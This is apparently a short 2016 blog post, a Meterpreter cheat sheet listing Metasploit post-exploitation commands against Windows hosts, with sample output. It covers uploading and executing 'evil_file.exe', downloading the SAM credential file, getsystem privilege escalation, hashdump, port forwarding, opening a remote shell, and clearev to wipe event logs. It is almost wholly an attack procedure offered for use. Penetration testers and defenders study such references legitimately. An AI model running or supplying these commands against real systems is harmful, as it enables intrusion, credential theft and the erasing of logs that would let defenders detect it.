29 Aug 2016, 16:22

meterpreter cheatsheet

Useful commands in Metasploit when spawning meterpreter shells.

uploading a file to a windows host

meterpreter > upload evil_file.exe c:\\windows\\system32
[*] uploading  : evil_file.exe -> c:\windows\system32
[*] uploaded   : evil_file.exe -> c:\windows\system32\evil_file.exe
meterpreter >

downloading a file from a windows host

meterpreter> download c:\\windows\\repair\\sam /tmp

executing uploaded executable on windows target

meterpreter> execute -f c:\\windows\\temp\\exploit.exe

creating a new channel with cmd.exe

meterpreter> execute -f cmd -c

show running processes

meterpreter> ps

open a shell inside a meterpreter session

meterpreter> shell

meterpreter automatic system privileges

meterpreter> getsystem

meterpreter automatic hash dump attempt

meterpreter> hashdump

meterpreter create port forward to another target host

meterpreter> portfwd add -l 80 -p 80 -r <target>

meterpreter> portfwd delete -l 80 -p 80 -r <target>

push meterpreter session to background

meterpreter> background

read text files

meterpreter> cat file.txt

list current working directory on remote host

meterpreter> pwd

c:\windows

clear event logs on remote system (clears Application, System and Security event logs)

meterpreter> clearev

getting the current user that meterpreter is running as

meterpreter> getuid

idle time of a system

meterpreter > idletime
User has been idle for: 2 hours 14 mins 5 secs
meterpreter >

looking at network information

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

INTEL PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0dc:21:11:f1:11
IP Address  : 192.168.0.1
Netmask     : 255.255.255.0

meterpreter >